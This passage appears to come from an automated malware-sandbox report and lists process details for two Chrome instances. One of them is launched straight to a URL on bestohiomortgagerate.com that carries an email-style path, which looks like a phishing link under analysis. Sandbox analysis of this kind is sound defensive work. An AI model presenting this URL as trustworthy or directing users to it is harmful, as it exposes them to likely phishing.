                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1996,i,13394074848288061541,3932029769900024955,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:02:34:21
                                                                                                                          Start date:17/04/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org"
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          No disassembly